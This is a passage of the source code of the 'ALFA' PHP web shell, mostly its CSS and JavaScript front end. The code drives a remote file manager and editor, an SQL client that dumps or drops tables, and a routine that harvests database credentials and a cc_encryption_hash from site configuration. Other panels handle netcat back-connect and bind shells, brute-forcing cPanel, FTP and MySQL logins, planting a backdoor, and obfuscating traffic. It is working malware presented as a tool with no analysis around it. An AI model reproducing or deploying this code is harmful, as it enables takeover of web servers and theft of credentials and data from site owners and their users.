strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#801818;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #801818;background:transparent;box-shadow:0 0 4px #801818;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#5550 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#801818;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#801818;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#801818;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#801818}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #801818;background:transparent;box-shadow:0 0 4px #801818;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #801818;background:transparent;box-shadow:0 0 4px #801818;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #801818;background:#000;text-decoration:none;box-shadow:0 0 4px #801818;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}
  1267. .foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'
  1268. .main th{text-align:left;}
  1269. .main a{color: #FFF;}
  1270. .main tr:hover{background-color:#646464;}
  1271. .ml1{ border:1px solid #801818;padding:5px;margin:0;overflow: auto; }
  1272. .bigarea{ width:99%; height:300px; }
  1273. '.alfaCssLoadColors().'
  1274. </style>';
  1275. echo "<script type='text/javascript'>
  1276. var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
  1277. var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
  1278. var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
  1279. var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
  1280. var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
  1281. var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
  1282. var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
  1283. var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
  1284. var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
  1285. var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
  1286. var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
  1287. var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
  1288. var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
  1289. var d = document;
  1290. var mysql_cache = {};
  1291. var editor_files = {};
  1292. var editor_error = true;
  1293. var editor_current_file = '';
  1294. var is_minimized = false;
  1295. var cgi_is_minimized = false;
  1296. var cgi_lang = '';
  1297. var upcount = 1;
  1298. var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
  1299. var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";
  1300. function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
  1301. if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
  1302. if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";
  1303. for($j=1;$j<=10;$j++){
  1304. echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';else d.mf.alfa'.$j.'.value=alfa'.$j.'_;';
  1305. }
  1306. echo "
  1307. if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
  1308. }";
  1309. echo 'function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\"header_pwd\" onclick=\"g(\'FilesMan\',\'/\');\" href=\'javascript:void(0);\'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');\" href=\'javascript:void(0);\' class=\"header_pwd\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="'.__showicon('loader').'"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}
  1310. function saveByKey(event){
  1311. if(!(String.fromCharCode(event.which).toLowerCase() == \'s\' && event.ctrlKey) && !(event.which == 19))return true;
  1312. $("editor_edit_area").onsubmit();
  1313. event.preventDefault();
  1314. return false;
  1315. }
  1316. function setCookie(cname, cvalue, exdays){
  1317. var d = new Date();
  1318. d.setTime(d.getTime() + (exdays*24*60*60*1000));
  1319. var expires = "expires="+ d.toUTCString();
  1320. document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
  1321. }
  1322. function getCookie(name){
  1323. var value = "; " + document.cookie;
  1324. var parts = value.split("; " + name + "=");
  1325. if (parts.length == 2) return parts.pop().split(";").shift();
  1326. }
  1327. function editorClose(pos){
  1328. d.body.style.overflow = "visible";
  1329. elem = $(pos);
  1330. elem.setAttribute("class", "editor-anim-close");
  1331. if(pos == "editor"){
  1332. is_minimized = false;
  1333. }else{
  1334. cgi_is_minimized = false;
  1335. }
  1336. setTimeout(function(){
  1337. elem.removeAttribute("class");
  1338. elem.style.display = "none";
  1339. }, 1000);
  1340. d.body.style.overflow = "visible";
  1341. }
  1342. function showEditor(pos){
  1343. $(pos).setAttribute("class", "editor-anim-show");
  1344. $(pos+"-minimized").setAttribute("class", "minimized-hide");
  1345. if(pos == "editor"){
  1346. is_minimized = false;
  1347. if(cgi_is_minimized){
  1348. $("cgiloader-minimized").style.top = "30%";
  1349. }
  1350. }else{
  1351. cgi_is_minimized = false;
  1352. if(is_minimized){
  1353. $("editor-minimized").style.top = "30%";
  1354. }
  1355. }
  1356. d.body.style.overflow = "hidden";
  1357. }
  1358. function editorMinimize(pos){
  1359. $(pos).setAttribute("class", "editor-anim-minimize");
  1360. $(pos+"-minimized").setAttribute("class", "minimized-show");
  1361. if(pos == "editor"){
  1362. is_minimized = true;
  1363. if(cgi_is_minimized){
  1364. $("cgiloader-minimized").style.top = "20%";
  1365. $("editor-minimized").style.top = "50%";
  1366. }else{
  1367. $("editor-minimized").style.top = "30%";
  1368. }
  1369. }else{
  1370. cgi_is_minimized = true;
  1371. if(is_minimized){
  1372. $("cgiloader-minimized").style.top = "20%";
  1373. $("editor-minimized").style.top = "50%";
  1374. }else{
  1375. $("cgiloader-minimized").style.top = "30%";
  1376. }
  1377. }
  1378. d.body.style.overflow = "visible";
  1379. }
  1380. function clearEditorHistory(){
  1381. var check = confirm("Are u Sure?");
  1382. if(check){
  1383. for(var i in editor_files){
  1384. if(i != editor_current_file){
  1385. removeHistory(i);
  1386. }
  1387. }
  1388. }
  1389. }
  1390. function editor(file, mode, arg, pwd, file_id, type){
  1391. if(type=="dir"&&file=="..")return false;
  1392. if(mode == "download"){
  1393. g("FilesTools",pwd,file,"download");
  1394. return false;
  1395. }
  1396. var param = "", fid = "", pure_fid = "", cwd = d.mf.c.value, can_append = true;
  1397. file = file.trim();
  1398. if(Object.keys(editor_files).length == 0){
  1399. var cookie_file = getCookie("alfa_history_files");
  1400. try{
  1401. editor_files = JSON.parse(cookie_file);
  1402. for(var t in editor_files){
  1403. insertToHistory(t, editor_files[t].file, 0, editor_files[t].type);
  1404. }
  1405. }catch(e){}
  1406. }
  1407. if(file.indexOf("/") != -1){
  1408. var file_split = file.split("/");
  1409. file = file_split[file_split.length - 1];
  1410. delete file_split[file_split.length - 1];
  1411. cwd = file_split.join("/");
  1412. if(islinux){
  1413. cwd = "/"+cwd;
  1414. }
  1415. }
  1416. if(typeof type == "undefined"){
  1417. type = "";
  1418. }
  1419. if(typeof pwd != "undefined" && pwd != null && pwd.length != 0){
  1420. cwd = pwd.trim();
  1421. }
  1422. try{
  1423. for(var i in editor_files){
  1424. if(editor_files[i].file == decodeURIComponent(file) && editor_files[i].pwd.replace(/\//g,"") == cwd.replace(/\//g,"")){
  1425. can_append = false;
  1426. file_id = i;
  1427. break;
  1428. }
  1429. }
  1430. }catch(e){
  1431. console.log(e);
  1432. }
  1433. editor_error = true;
  1434. if(typeof arg != "undefined" && arg.length != 0 && arg != null){
  1435. param = alfab64(arg);
  1436. }
  1437. if(typeof file_id != "undefined" && file_id != null && file_id.length != 0){
  1438. fid = alfab64(file_id);
  1439. pure_fid = file_id;
  1440. }else{
  1441. var rand_fid = "file_" + getRandom(10);
  1442. fid = alfab64(rand_fid);
  1443. pure_fid = rand_fid;
  1444. }
  1445. alfaloader("block");
  1446. _Ajax(d.URL, "a="+alfab64("FilesTools")+"&c="+alfab64(cwd)+"&alfa1="+alfab64(file)+"&alfa2="+alfab64(mode)+"&alfa3="+param+"&alfa4="+fid+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"), function(e){
  1447. document.querySelector(".editor-content").innerHTML = e;
  1448. $("editor").style.display = "block";
  1449. alfaloader("none");
  1450. evalJS(e);
  1451. if(mode != "delete" && editor_error){
  1452. var active = d.getElementsByClassName("is_active");
  1453. if(active.length != 0){
  1454. active[0].className = "file-holder";
  1455. }
  1456. fid = pure_fid;
  1457. file = decodeURIComponent(file);
  1458. if(!editor_files[fid] && can_append){
  1459. editor_files[fid] = {"file": file, "pwd": cwd, "type": type};
  1460. insertToHistory(fid, file, " is_active", type);
  1461. if(mode=="mkfile"){
  1462. g("FilesMan",null);
  1463. }
  1464. }else{
  1465. $(fid).parentNode.className += " is_active";
  1466. }
  1467. }
  1468. d.body.style.overflow = "hidden";
  1469. d.getElementsByClassName("filestools")[0].setAttribute("fid", fid);
  1470. if(editor_files[fid]){
  1471. d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
  1472. }
  1473. editor_current_file = fid;
  1474. if(is_minimized){
  1475. showEditor("editor");
  1476. }
  1477. updateCookieEditor();
  1478. });
  1479. return false;
  1480. }
  1481. function insertToHistory(fid, file, mode, type){
  1482. var active = "";
  1483. if(mode && mode != 0){
  1484. active = mode;
  1485. }
  1486. var NewElement = document.createElement("div");
  1487. NewElement.innerHTML = "<div id=\'"+fid+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(file,type,fid)+"</div><div class=\'editor-file-name\'>"+file+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\""+fid+"\");\'>X</div>";
  1488. NewElement.className = "file-holder" + active;
  1489. NewElement.addEventListener("mouseover", function(){setEditorTitle(fid,"over");this.childNodes[1].style.opacity = "1";});
  1490. NewElement.addEventListener("mouseout", function(){setEditorTitle(fid,"out");this.childNodes[1].style.opacity = "0";});
  1491. var refNode = d.getElementsByClassName("history-list")[0];
  1492. refNode.insertBefore(NewElement, refNode.firstChild);
  1493. }
  1494. function loadType(file,type,id){
  1495. if(type == "none"){
  1496. _Ajax(d.URL, "a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[id].pwd)+"&arg="+alfab64(editor_files[id].file), function(e){
  1497. $(id).innerHTML = "<div class=\'editor-icon\'>"+loadType(editor_files[id].file,e,id)+"</div><div class=\'editor-file-name\'>"+editor_files[id].file+"</div>";
  1498. editor_files[id].type = e;
  1499. });
  1500. }
  1501. var img = \'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\';
  1502. if(type == "file"){
  1503. type = file.split(".");
  1504. type = type[type.length - 1].toLowerCase();
  1505. var types = ["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"];
  1506. if(types.indexOf(type) == -1){
  1507. type = "notfound";
  1508. }
  1509. }else{
  1510. type = "folder";
  1511. }
  1512. return img.replace("{type}", type + ".png");
  1513. }
  1514. function updateDirsEditor(fid, fname){
  1515. var current_path = d.mf.c.value + "/";
  1516. var oldpath = editor_files[fid].pwd + "/" + fname + "/";
  1517. var newpath = editor_files[fid].pwd + "/" + editor_files[fid].file + "/";
  1518. oldpath = oldpath.replace(/\/\//g, "/");
  1519. newpath = newpath.replace(/\/\//g, "/");
  1520. current_path = current_path.replace(/\/\//g, "/");
  1521. if(current_path.search(oldpath) != -1){
  1522. initDir(current_path.replace(oldpath, newpath));
  1523. d.mf.c.value = current_path.replace(oldpath, newpath);
  1524. _Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)});
  1525. }
  1526. for(var i in editor_files){
  1527. var path = editor_files[i].pwd + "/";
  1528. path = path.replace(/\/\//g, "/");
  1529. if(path.search(oldpath) != -1){
  1530. editor_files[i].pwd = path.replace(oldpath, newpath);
  1531. }
  1532. }
  1533. var reg1 = new RegExp("\'"+oldpath.slice(0, -1)+"\'");
  1534. var reg2 = new RegExp(fname + " \\\|</b></a>");
  1535. d.files.innerHTML = d.files.innerHTML.replace(reg1, "\'"+newpath.slice(0, -1)+"\'");
  1536. d.files.innerHTML = d.files.innerHTML.replace(reg2, editor_files[fid].file+" |</b></a>");
  1537. updateCookieEditor();
  1538. }
  1539. function updateCookieEditor(){
  1540. setCookie("alfa_history_files", JSON.stringify(editor_files), 2012);
  1541. }
  1542. function setEditorTitle(fid, mode){
  1543. if(mode == "out" && editor_current_file != ""){
  1544. fid = editor_current_file;
  1545. }
  1546. if(editor_files[fid]){
  1547. d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
  1548. }
  1549. }
  1550. function removeHistory(el){
  1551. delete editor_files[el];
  1552. if($(el)){
  1553. $(el).parentNode.parentNode.removeChild($(el).parentNode);
  1554. }
  1555. var elm = d.getElementsByClassName("filestools")[0];
  1556. if(elm){
  1557. if(elm.getAttribute("fid") == el){
  1558. elm.outerHTML = "";
  1559. }
  1560. }
  1561. if(editor_current_file == el){
  1562. editor_current_file = "";
  1563. }
  1564. updateCookieEditor();
  1565. }
  1566. function getRandom(e){
  1567. for(var i = "undefined" == typeof e ? 20 : e, t = "", s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", n = i; n > 0; --n) t += s[Math.floor(Math.random() * s.length)];
  1568. return t
  1569. }
  1570. function reopen(el){
  1571. var file_id = el.getAttribute("id")
  1572. var pwd = editor_files[file_id].pwd;
  1573. var filename = editor_files[file_id].file;
  1574. editor(filename, "auto", "", pwd, file_id);
  1575. }
  1576. function copyToClipboard(el){
  1577. var node = document.getElementById(el);
  1578. if(document.selection){
  1579. var range = document.body.createTextRange();
  1580. range.moveToElementText(document.getElementById(el));
  1581. range.select();
  1582. document.execCommand("Copy");
  1583. alert("text copied");
  1584. }else if (window.getSelection()){
  1585. var range = document.createRange();
  1586. range.selectNode(document.getElementById(el));
  1587. window.getSelection().removeAllRanges();
  1588. window.getSelection().addRange(range);
  1589. document.execCommand("copy");
  1590. alert("text copied");
  1591. }
  1592. }
  1593. function encrypt(str, pwd) {
  1594. if (pwd == null || pwd.length <= 0) {
  1595. return null;
  1596. }
  1597. str = alfab64(str, true);
  1598. pwd = alfab64(pwd, true);
  1599. var enc_chr = "";
  1600. var enc_str = "";
  1601. var i = 0;
  1602. while (i < str.length) {
  1603. for (var j = 0; j < pwd.length; j++) {
  1604. enc_chr = str.charCodeAt(i) ^ pwd.charCodeAt(j);
  1605. enc_str += String.fromCharCode(enc_chr);
  1606. i++;
  1607. if (i >= str.length) break;
  1608. }
  1609. }
  1610. return alfab64(enc_str, true);
  1611. }
  1612. function reloadSetting(e){
  1613. alfaloader("block");
  1614. _Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},true);
  1615. if(e.e.value==0&&e.protect.value==1)setTimeout("location.reload()",1000);
  1616. if(e.s.value!=e.icon.value)setTimeout("location.reload()",1000);
  1617. return false
  1618. }
  1619. function reloadColors(config){
  1620. var obj = {};
  1621. if(typeof config == "undefined"){
  1622. d.querySelectorAll(".colors_input").forEach(function(e){
  1623. var id = e.getAttribute("target").replace(".", "");
  1624. obj[id] = e.value;
  1625. });
  1626. }else{
  1627. obj = config;
  1628. }
  1629. alfaloader("block");
  1630. var checdk = ($("use_default_color").checked?"1":"0");
  1631. _Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(obj))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(checdk)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none");evalJS(e);},true);
  1632. }
  1633. function alfab64(a, normal){
